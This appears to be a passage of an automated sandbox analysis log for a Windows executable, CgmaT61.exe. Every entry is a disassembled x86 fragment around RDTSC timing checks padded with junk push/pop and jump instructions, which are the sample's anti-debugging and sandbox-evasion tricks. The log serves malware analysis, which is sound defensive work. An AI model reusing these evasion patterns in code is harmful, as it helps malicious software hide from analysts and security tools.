Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23B07 second address: C23B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23B0D second address: C23B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23B24 second address: C23B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E290h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b mov si, ax 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D296Ch], eax 0x00000016 call 00007FD32D43E289h 0x0000001b jno 00007FD32D43E29Ch 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 jc 00007FD32D43E286h 0x0000002b pop edi 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23B75 second address: C23BAF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD32CC50B98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jp 00007FD32CC50B9Eh 0x00000014 mov eax, dword ptr [eax] 0x00000016 jp 00007FD32CC50BA2h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push edi 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23BAF second address: C23C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop eax 0x00000007 sub cx, 9D41h 0x0000000c push 00000003h 0x0000000e pushad 0x0000000f mov esi, 7C3207B8h 0x00000014 pushad 0x00000015 movsx esi, di 0x00000018 mov dword ptr [ebp+122D265Bh], edi 0x0000001e popad 0x0000001f popad 0x00000020 push 00000000h 0x00000022 mov ecx, dword ptr [ebp+122D2C6Eh] 0x00000028 push 00000003h 0x0000002a mov ecx, 400B2494h 0x0000002f push 52EA4300h 0x00000034 jmp 00007FD32D43E297h 0x00000039 add dword ptr [esp], 6D15BD00h 0x00000040 mov edi, 1BDB8571h 0x00000045 lea ebx, dword ptr [ebp+12451802h] 0x0000004b mov dword ptr [ebp+122D2948h], edi 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push edx 0x00000055 jc 00007FD32D43E286h 0x0000005b pop edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23C1D second address: C23C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C417D9 second address: C4180E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD32D43E28Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD32D43E299h 0x00000013 jns 00007FD32D43E286h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4195F second address: C41975 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD32CC50B96h 0x00000008 jc 00007FD32CC50B96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C41975 second address: C4198A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FD32D43E286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007FD32D43E286h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C41E9B second address: C41EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C41FFB second address: C42001 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42001 second address: C42007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42007 second address: C4200B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42572 second address: C42576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42576 second address: C42580 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42580 second address: C42587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42B29 second address: C42B49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E294h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FD32D43E286h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42B49 second address: C42B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42F90 second address: C42FAE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD32D43E291h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C42FAE second address: C42FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD32CC50BA1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C46747 second address: C46755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C46755 second address: C46759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C49BE8 second address: C49BF2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C63B second address: C0C63F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C63F second address: C0C645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C645 second address: C0C656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FD32CC50B9Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C656 second address: C0C676 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD32D43E286h 0x00000008 jmp 00007FD32D43E292h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C676 second address: C0C680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD32CC50B96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C680 second address: C0C6BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E294h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jng 00007FD32D43E288h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD32D43E295h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C0C6BC second address: C0C6C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E553 second address: C4E557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E557 second address: C4E577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD32CC50BA3h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C14B9A second address: C14BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C14BA0 second address: C14BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C14BA6 second address: C14BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C14BAC second address: C14BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32CC50B9Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C14BBF second address: C14BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FD32D43E286h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4DC52 second address: C4DC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E103 second address: C4E10B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E10B second address: C4E10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E10F second address: C4E11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD32D43E28Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E3C7 second address: C4E3D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD32CC50B96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E3D2 second address: C4E3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E3D8 second address: C4E3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E3E9 second address: C4E3EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C4E3EF second address: C4E3F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5101D second address: C51021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51021 second address: C51027 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51124 second address: C51128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51128 second address: C51135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51135 second address: C5118F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jnl 00007FD32D43E288h 0x00000013 push ebx 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop eax 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007FD32D43E288h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov esi, dword ptr [ebp+124606BCh] 0x00000039 sub dword ptr [ebp+122D26AFh], edx 0x0000003f call 00007FD32D43E289h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push esi 0x00000048 pop esi 0x00000049 jns 00007FD32D43E286h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5118F second address: C511A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32CC50B9Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C511A2 second address: C511D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jl 00007FD32D43E29Ch 0x00000010 push esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop esi 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C511D6 second address: C511DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51312 second address: C51316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C515A4 second address: C515A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C515A8 second address: C515B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51964 second address: C5196E instructions: 0x00000000 rdtsc 0x00000002 je 00007FD32CC50B9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51E51 second address: C51E5B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51E5B second address: C51E97 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD32CC50B98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b adc si, 244Fh 0x00000010 nop 0x00000011 pushad 0x00000012 jne 00007FD32CC50B98h 0x00000018 jmp 00007FD32CC50BA4h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 js 00007FD32CC50B96h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51E97 second address: C51E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C51E9B second address: C51EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5205F second address: C52063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52063 second address: C52069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52069 second address: C5206E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5212D second address: C52133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52133 second address: C52167 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FD32D43E295h 0x00000015 jmp 00007FD32D43E28Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52438 second address: C52442 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD32CC50B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52442 second address: C5244C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD32D43E286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52A9C second address: C52AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52AA1 second address: C52AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jl 00007FD32D43E286h 0x00000012 pop edi 0x00000013 jnc 00007FD32D43E28Ch 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d mov dword ptr [ebp+122D1B9Fh], eax 0x00000023 push 00000000h 0x00000025 mov edi, dword ptr [ebp+122D28FEh] 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD32D43E28Fh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C52AE5 second address: C52AF3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD32CC50B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C55B45 second address: C55B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C558CD second address: C558D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C55B4A second address: C55B54 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD32D43E28Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C558D3 second address: C558D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C570E6 second address: C570EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C57B93 second address: C57B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD32CC50B96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C57B9D second address: C57BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5947B second address: C5948C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD32CC50B98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5B7F4 second address: C5B889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD32D43E288h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov dword ptr [ebp+12476396h], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FD32D43E288h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 or bx, 03CBh 0x00000049 push 00000000h 0x0000004b jmp 00007FD32D43E298h 0x00000050 xchg eax, esi 0x00000051 jnl 00007FD32D43E29Bh 0x00000057 ja 00007FD32D43E295h 0x0000005d push eax 0x0000005e pushad 0x0000005f push edi 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5D86E second address: C5D891 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD32CC50BA4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FD32CC50B96h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5D891 second address: C5D897 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5E8F7 second address: C5E910 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jng 00007FD32CC50B9Ch 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C5E910 second address: C5E954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FD32D43E288h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov bx, A3FFh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+1244AEFEh], ecx 0x0000002f xchg eax, esi 0x00000030 je 00007FD32D43E292h 0x00000036 jo 00007FD32D43E28Ch 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C6091E second address: C6093C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD32CC50B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD32CC50BA2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C628B8 second address: C628D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD32D43E297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
